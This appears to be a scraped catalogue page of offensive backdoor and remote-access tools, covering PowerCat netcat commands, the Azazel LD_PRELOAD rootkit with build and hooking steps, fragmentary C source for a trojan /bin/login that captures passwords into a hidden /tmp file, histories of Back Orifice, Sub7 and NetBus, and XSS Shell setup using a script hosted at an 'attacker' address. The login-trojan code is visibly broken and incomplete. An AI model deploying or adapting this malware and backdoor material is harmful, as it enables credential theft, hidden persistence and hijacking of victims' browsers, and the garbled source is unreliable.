Remote Administration Tool

Backdoor, tool that allows you to remotely access and control a computer/device

Penetration Testers Framework

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.

Cortana Scripts by Mudge

Cortana is a scripting language for Armitage and Cobalt Strike. This is a collection of Cortana scripts that can be used with Cobalt Strike and Armitage.


Netcat: The powershell version. (Powershell Version 2 and Later Supported)

More Information:

Functions & Parameters:

Start-PowerCat # Starts a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb.
-Port # The port to listen on.
-PipeName # Name of pipe to listen on.

-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: ":"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-KeepAlive # Restart after disconnecting.
-Timeout # Timeout option. Default: 60 seconds

Connect-PowerCat # Connects a client to a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb
-RemoteIp # IPv4 address of host to connect to.
-Port # The port to connect to.
-PipeName # Name of pipe to connect to.

-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: "::"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-Timeout # Timeout option. Default: 60 seconds
Basic Connections

By default, PowerCat uses TCP and reads from / writes to the console.

# Basic Listener:
Start-PowerCat -Port 443

# Basic Client:
Connect-PowerCat -RemoteIp -Port 443
File Transfer

PowerCat can be used to transfer files using the -SendFile and -ReceiveFile parameters.

# Send File:
Connect-PowerCat -RemoteIp -Port 443 -SendFile C:\pathto\inputfile

# Receive File:


Azazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.

Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells.

Crypthook encrypted accept() backdoor
Plaintext accept() backdoor

PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings

Clone the sources
localhost:~ $ git clone

Build the rootkit
localhost:~ $ make

Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as into /lib. An entry is then added to /etc/ in order to hook system wide dynamically compiled programs.

Example runtime hooking of bash.
localhost:~ $ LD_PRELOAD=/lib/ bash -l

Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list.
This allows all of the required functions to be linked upon initiation of the library.
Syscall function names are XORed by and written to const.h
Original libc functions can be accessed by using the preprocessor definitions also in const.h
Each definition has a prefix of SYS_name_of_function_in_caps.
For example to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func();
typedef struct struct_syscalls {


Trojan /bin/login.

/* tl0gin 0.1 (c)oded by m4rc3l0 in 11/09/2002(putz)  *
 *              *
 * Greetz: BashX, roadhouse, sinner, decodi, r0ot, hts,  *
 * midnight, behael, dacker, seed, m4st, mor_PH_eus,  *
 * eSc2, anjinh0, bionatus..        *
 *              *
 * Mail-me: <a href="mailto:[email protected]">[email protected]</a>      */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>

/* Error */
#define ERROR1 "Login incorrect"

/* Arquive */
#define ARQUI "/tmp/.tl0101"

/* Others */
#define MAX 500
#define ERRO -1
#define LOGIN "/bin/login"

void banner();
void loga();
void retorna();
int pega_info();
int grava_arq(char login[100], char passwd[100]);

char sys_name[100];
char sys_release[100];

int main()
    FILE *fp;

    signal(SIGINT, retorna);
    signal(SIGSTOP, retorna);
    signal(SIGQUIT, retorna);


void loga() {
    int pid;
    char login[MAX], passwd[MAX], esconde[MAX], hostname[MAX];
    char *pass;
    pid = getppid();
    gethostname(hostname, sizeof(hostname));

    for(;;) {
  for(;;) {

      printf("%s login: ", hostname);

      if(strcmp(login, "") != )
    goto PRIMEIRO;

      pass = (char *)getpass ("Password: ");
      printf("%s\n\n", ERROR1);
      if(strlen(login) >= 3)
    goto SEGUNDO;
  grava_arq(login, pass);
  kill(pid, 9);
  execl(LOGIN, "", NULL);

int pega_info() {
    struct utsname info;

    if(uname(&info) == -1) {
  return -1;

    sprintf(sys_name, "%s", info.sysname);
    sprintf(sys_release, "%s", info.release);


SSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.

Back Orifice (BO)

Back Orifice debuted at DEF CON 6 on August 1, 1998. It was the brainchild of Sir Dystic, a member of the U.S. hacker organization Cult of the Dead Cow. According to the group, its purpose was to demonstrate the lack of security in Microsoft's operating system Windows 98.

The last version was bo2k (back orifice 2k) which previously had the source code open & available for download. Currently we have been unable to locate a copy of that source.

The Back Orifice Server Contains the Following Functionality
System control
Create dialog boxes with the text of your choice. Log keystrokes. Lockup or reboot the machine.

Get detailed system information, including:
current user
cpu type
windows version
memory usage
mounted disks
(including hard drives, cdroms, removable drives and remote network drives) and information for those drives
screensaver password
passwords cached by the user
(including those for dialups, web and network access, and any other password cached by the operating system)

File system control
Copy, rename, delete, view, and search files and directories. File compression and decompression.
Process control
List, kill, and spawn processes.
Registry control
List, create, delete and set keys and values in the registry.
Network control
View all accessible network resources, all incoming and outgoing connections, list, create and delete network connections, list all exported resources and their passwords, create and delete exports.
Multimedia control
Play wav files, capture screen shots, and capture video or still frames from any video input device (like a Quickcam).
Packet redirection
Redirect any incoming TCP or UDP port to any other address & port.
Application redirection
Spawn most console applications (such as on any TCP port, allowing control of applications via a telnet session.
HTTP server Upload and download files on any port using a www client such as Netscape.

Sub7, Subseven

Sub7, or SubSeven or Sub7Server, is a remote administration tool/trojan program (RAT—where the "T" can have a dual meaning in this case).[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven".
Because its typical use is to allow undetected and unauthorized access, Sub7 is usually described as a trojan horse by security experts.
Sub7 worked on the Windows 9x and on the Windows NT family of operating systems, up to and including Windows XP

It was originally designed by someone with the handle 'mobman'. No development has occurred in several years until a new version scheduled for release on Feb. 28th, 2010. The Sub7 project was dormant for over 6 years until. In October 2009 mobman was alleged to have stated via IRC that due to working and going to college full-time that he will not be able to help with Sub7.

In 2006 a website ( / ( with hundreds of thousands of users kept the sub7 alive with clean downloads and support and new software. A new version was created by defcon but not released that only a hand full of people knew about and used well.

SubSeven 2.3, released on March 9, 2010, was revamped to work on all 32-bit and 64-bit versions of Windows and includes TCP Tunnel and Password Recovery for browsers, instant messengers and email clients.

Sub7 has more features than Netbus (webcam capture, multiple port redirect, user-friendly registry editor, chat and more), but it always tries to install itself into windows directory and it does not have activity logging.
According to a security analysis,[8] Sub7's server-side (target computer) features include:
sound files from a microphone attached to the machine
images from an attached video camera
screen shots of the computer
retrieving a listing of recorded and cached passwords


NetBus was written in Delphi by Carl-Fredrik Neikter, a Swedish programmer in March 1998. It was in wide circulation before Back Orifice was released, in August 1998. The author claimed that the program was meant to be used for pranks, not for illegally breaking into computer systems. Translated from Swedish, the name means "NetPrank".

When started for the first time, the server would install itself on the host computer, including modifying the Windows registry so that it starts automatically on each system startup. The server is a faceless process listening for connections on port 12345 (in some versions, the port number can be adjusted). Port 12346 is used for some tasks, as well as port 20034.

The client was a separate program presenting a graphical user interface that allowed the user to perform a number of activities on the remote computer. Examples of its capabilities:
Keystroke logging
Keystroke injection
Screen captures
Program launching
File browsing
Shutting down the system
Opening / closing CD-tray
Tunneling protocol (NetBus connections through a number of systems.)

The NetBus client was designed to support the following operating system versions:
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Netbus client (v1.70) works fine in Windows 2000 and in Windows XP as well

XSS Shell

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by “XSS-Proxy –”. Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page.

XSS Shell uses ASP + MS Access database as backend but you can simply port them into any other server-side solution. You just need to stick with simple communication protocol.
Install Admin Interface

Copy “xssshell” folder into your web server
Copy “db” to a secure place (below root)
Configure “database path” from “xssshell/db.asp”
Modify hard coded password in db.asp [default password is : w00t]
Now you can access admin interface from something like http://[YOURHOST]/xssshell/

Configure XSS Shell for communication;
Open xssshell.asp
2. Set “SERVER” variable to where your XSSShell folder is located. i.e: “http://[YOURHOST]/xssshell/”;
3. Be sure to check “ME”, “CONNECTOR”, “COMMANDS_URL” variables. If you changed filenames, folder names or some kind of different configuration you need modify them.

Now open your admin interface from your browser,
To test it, just modify “sample_victim/default.asp” source code and replace “http://attacker:81/release/xssshell.js” URL with your own XSS Shell URL. Open “sample_victim” folder in some other browser and may be upload in to some other server.

Now you should see a zombie in admin interface. Just write something into “parameters” textarea and click “alert()”. You should see an alert message in victim’s browser.

Security Notes
As a hunter be careful about possible “Backfire” in getSelfHTML(). Someone can hack you back or track you by another XSS or XSS Shell attack.
Checkout “showdata.asp” and implement your own “filter()” function to make it safer for you.
Put “On error resume next” to db.asp, better modify your web server to not show any error.

Syndicate content